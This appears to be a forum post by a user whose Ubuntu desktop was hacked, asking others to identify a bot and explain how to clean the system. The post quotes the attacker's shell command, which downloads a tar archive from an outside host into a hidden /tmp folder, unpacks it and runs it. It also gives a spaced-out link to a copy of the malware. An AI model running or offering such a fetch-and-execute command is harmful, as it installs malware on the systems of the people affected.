Hi.
I am totally amazed as how my lounge ubuntu 10.04 desktop got hacked. Pressing the up arrow one single time in xterm got me the following:
Code:
cd /tmp;mkdir .,.;cd .,.;wget http://mikutzul.100free.com/LiDaFrMECH.tar;tar xvf LiDaFrMECH.tar;rm -rf LiDaFrMECH.tar;cd .em;chmod +x *;./start kit;exit
For those interested: I have put the file on my ftp at http:// ci2.ca / files / LiDaFRMECH.tar (see that I have put spaces in the link for it not to be too easily clickable. Downloading it on a Windows system, Avast reported it as an ELF_RST.B type attack.
Can anyone help me identify what this bot is and how it could have gotten installed into my "me only access" computer. It's not even going on the net. It's plugged into my home network, but the fixed IP on it has no port forwarded from the router. What troubles me is that this is the very last command ran after the last time I logged into the shell of this system some few hours ago.
Here is the list of things I did in this system:
- installed ubuntu 10.04 on a frech new system
- updated ubuntu
- installed xbmc and filezilla (to only ftp enormous files from my dedicated server to my home only...)
- installed freenx (terminal client citrix like) as per ubuntu's procedure
And all these were done a long while ago. This system has ran for weeks now. Except freenx that is recent.
I have identified that this is a bot. Killed the process numerous times... Removed the hidden folder in tmp and rebooted. I don't really know if this did the trick.
Can anyone help me identify what this is and where to look in order to "clean" my system?
Best regards.